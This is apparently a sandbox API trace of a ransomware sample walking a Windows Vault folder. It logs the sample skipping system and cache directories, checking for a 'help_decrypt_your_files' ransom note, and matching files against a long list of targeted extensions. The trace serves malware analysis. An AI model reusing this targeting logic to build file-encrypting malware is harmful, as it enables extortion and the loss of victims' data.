	[0177.367] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.367] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\*.*", lpSrch="program files") returned 0x0
	[0177.367] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.367] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\*.*", lpSrch="program files (x86)") returned 0x0
	[0177.368] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.368] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\*.*", lpSrch="appdata") returned 0x0
	[0177.368] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.368] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\*.*", lpSrch="application data") returned 0x0
	[0177.368] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.368] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\*.*", lpSrch="winnt") returned 0x0
	[0177.368] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.369] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\*.*", lpSrch="tmp") returned 0x0
	[0177.369] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.369] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\*.*", lpSrch="cache") returned 0x0
	[0177.369] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.369] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\*.*", lpSrch="temporary internet files") returned 0x0
	[0177.369] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.370] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\*.*", lpSrch="webcache") returned 0x0
	[0177.370] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.371] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\*.*", lpSrch="inetcache") returned 0x0
	[0177.371] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.371] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\*.*", lpSrch="nvidia") returned 0x0
	[0177.371] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.371] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\*.*", lpSrch="packages") returned 0x0
	[0177.371] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.371] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\*.*", lpSrch="cookies") returned 0x0
	[0177.372] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.372] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\*.*", lpSrch="programdata") returned 0x0
	[0177.372] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x448c3dac, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x448c3dac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x448c3dac, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0177.372] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x448c3dac, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x448c3dac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x448c3dac, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x9e, dwReserved0=0x0, dwReserved1=0x0, cFileName="154E23D0-C644-4E6F-8CE6-5069272F999F.vsch", cAlternateFileName="154E23~1.VSC")) returned 1
	[0177.372] lstrcmpW (lpString1="154E23D0-C644-4E6F-8CE6-5069272F999F.vsch", lpString2="..") returned 1
	[0177.372] lstrcmpW (lpString1="154E23D0-C644-4E6F-8CE6-5069272F999F.vsch", lpString2=".") returned 1
	[0177.372] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\") returned="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\"
	[0177.372] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\", lpString2="154E23D0-C644-4E6F-8CE6-5069272F999F.vsch" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch") returned="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch"
	[0177.373] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch") returned 113
	[0177.373] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.373] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch", cchLength=0x71 | out: lpsz="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\154e23d0-c644-4e6f-8ce6-5069272f999f.vsch") returned 0x71
	[0177.373] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.373] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\154e23d0-c644-4e6f-8ce6-5069272f999f.vsch", lpSrch="help_decrypt_your_files") returned 0x0
	[0177.373] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\154e23d0-c644-4e6f-8ce6-5069272f999f.vsch" | out: lpString1="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\154e23d0-c644-4e6f-8ce6-5069272f999f.vsch") returned="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\154e23d0-c644-4e6f-8ce6-5069272f999f.vsch"
	[0177.373] lstrlenW (lpString="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\154e23d0-c644-4e6f-8ce6-5069272f999f.vsch") returned 113
	[0177.373] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.374] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.374] StrStrW (lpFirst=".vsch", lpSrch=".") returned=".vsch"
	[0177.374] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.374] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".vsch") returned 0x0
	[0177.374] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x448c3dac, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x448c3dac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x448c3dac, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x6e, dwReserved0=0x0, dwReserved1=0x0, cFileName="2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch", cAlternateFileName="2F1A65~1.VSC")) returned 1
	[0177.374] lstrcmpW (lpString1="2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch", lpString2="..") returned 1
	[0177.375] lstrcmpW (lpString1="2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch", lpString2=".") returned 1
	[0177.375] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\") returned="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\"
	[0177.375] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\", lpString2="2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch") returned="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch"
	[0177.375] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch") returned 113
	[0177.375] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.375] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch", cchLength=0x71 | out: lpsz="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\2f1a6504-0641-44cf-8bb5-3612d865f2e5.vsch") returned 0x71
	[0177.375] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.375] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\2f1a6504-0641-44cf-8bb5-3612d865f2e5.vsch", lpSrch="help_decrypt_your_files") returned 0x0
	[0177.375] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\2f1a6504-0641-44cf-8bb5-3612d865f2e5.vsch" | out: lpString1="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\2f1a6504-0641-44cf-8bb5-3612d865f2e5.vsch") returned="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\2f1a6504-0641-44cf-8bb5-3612d865f2e5.vsch"
	[0177.376] lstrlenW (lpString="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\2f1a6504-0641-44cf-8bb5-3612d865f2e5.vsch") returned 113
	[0177.376] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.376] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.376] StrStrW (lpFirst=".vsch", lpSrch=".") returned=".vsch"
	[0177.376] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.376] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".vsch") returned 0x0
